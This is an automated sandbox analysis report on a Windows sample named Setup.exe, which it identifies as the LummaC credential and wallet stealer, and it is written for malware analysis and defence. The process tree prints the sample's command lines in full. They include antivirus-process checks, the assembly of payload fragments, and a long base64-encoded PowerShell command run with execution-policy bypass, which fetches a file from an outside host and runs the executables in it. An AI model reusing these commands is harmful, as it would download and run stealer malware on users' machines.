Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1570755
MD5:5efe766f54925452535ef011161edd16
SHA1:a03fdc832eece5fbed02c3987be9571098af24d4
SHA256:9262348e1aa8c196cd38efcca58146dca6c40ad5132744f96e6b7ced57eb8fcd
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 5EFE766F54925452535EF011161EDD16)
    • cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7772 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7780 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7820 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7828 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7872 cmdline: cmd /c md 189943 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7888 cmdline: findstr /V "ExpendituresReactionsRioWinterDialReducedPricingSoftware" Dennis MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7908 cmdline: cmd /c copy /b ..\Handbook + ..\Attorneys + ..\Celebration + ..\Advert + ..\Loop + ..\Objectives + ..\Added X MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Attachment.com (PID: 7924 cmdline: Attachment.com X MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • powershell.exe (PID: 7736 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 3592 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 8132 cmdline: powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBMAGUAbgBnAHQAaAApAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAC4AUwBlAGUAawAoADAALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBTAGUAZQBrAE8AcgBpAGcAaQBuAF0AOgA6AEIAZQBnAGkAbgApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkACgAgACAAIAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEMAbwBtAGIAaQBuAGUAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEALAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAKACAAIAAgACAAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBDAG8AbQBiAGkAbgBlACgAJABlAG4AdgA6AFQARQBNAFAALAAgACIAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAC4AegBpAHAAIgApAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAFQAbwBBAHIAcgBhAHkAKAApACkACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ACgAgACAAIAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAApAAoAIAAgACAAIAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAKQAKAAoAIAAgACAAIAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAuAEMAbwBwAHkASABlAHIAZQAoACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAuAEkAdABlAG0AcwAoACkALAAgADIAMAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBQAGEAdABoACAAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAIAAtAEYAaQBsAHQAZQByACAAKgAuAGUAeABlACAALQBSAGUAYwB1AHIAcwBlAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAaQBuACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgALgBGAHUAbABsAE4AYQBtAGUAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAC0AVwBhAGkAdAAKACAAIAAgACAAfQAKAAoAfQAKAAoAJgAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD4AIAAkAG4AdQBsAGwAIAAyAD4AJgAxAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7948 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 7736INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x6f8b7:$b3: ::UTF8.GetString(
      • 0x871c5:$s1: -join
      • 0xdea05:$s1: -join
      • 0xebada:$s1: -join
      • 0xeeeac:$s1: -join
      • 0xef55e:$s1: -join
      • 0xf104f:$s1: -join
      • 0xf3255:$s1: -join
      • 0xf3a7c:$s1: -join
      • 0xf42ec:$s1: -join
      • 0xf4a27:$s1: -join
      • 0xf4a59:$s1: -join
      • 0xf4aa1:$s1: -join
      • 0xf4ac0:$s1: -join
      • 0xf5310:$s1: -join
      • 0xf548c:$s1: -join
      • 0xf5504:$s1: -join
      • 0xf5597:$s1: -join
      • 0xf57fd:$s1: -join
      • 0xf7993:$s1: -join
      • 0x1063dd:$s1: -join
      Process Memory Space: powershell.exe PID: 8132INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x191dec:$b1: ::WriteAllBytes(
      • 0x89f4:$s1: -join
      • 0x150e1:$s1: -join
      • 0x221b6:$s1: -join
      • 0x25588:$s1: -join
      • 0x25c3a:$s1: -join
      • 0x2772b:$s1: -join
      • 0x29931:$s1: -join
      • 0x2a158:$s1: -join
      • 0x2a9c8:$s1: -join
      • 0x2b103:$s1: -join
      • 0x2b135:$s1: -join
      • 0x2b17d:$s1: -join
      • 0x2b19c:$s1: -join
      • 0x2b9ec:$s1: -join
      • 0x2bb68:$s1: -join
      • 0x2bbe0:$s1: -join
      • 0x2bc73:$s1: -join
      • 0x2bed9:$s1: -join
      • 0x2e06f:$s1: -join
      • 0x3cab9:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi32_7736.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2ab:$b3: ::UTF8.GetString(
      • 0x9f47:$s1: -join
      • 0x36f3:$s4: +=
      • 0x37b5:$s4: +=
      • 0x79dc:$s4: +=
      • 0x9af9:$s4: +=
      • 0x9de3:$s4: +=
      • 0x9f29:$s4: +=
      • 0x37a39:$s4: +=
      • 0x37ab9:$s4: +=
      • 0x37b7f:$s4: +=
      • 0x37bff:$s4: +=
      • 0x37dd5:$s4: +=
      • 0x37e59:$s4: +=
      • 0x245:$e1: System.Diagnostics.Process

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Net WebClient Casing Anomalies
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbA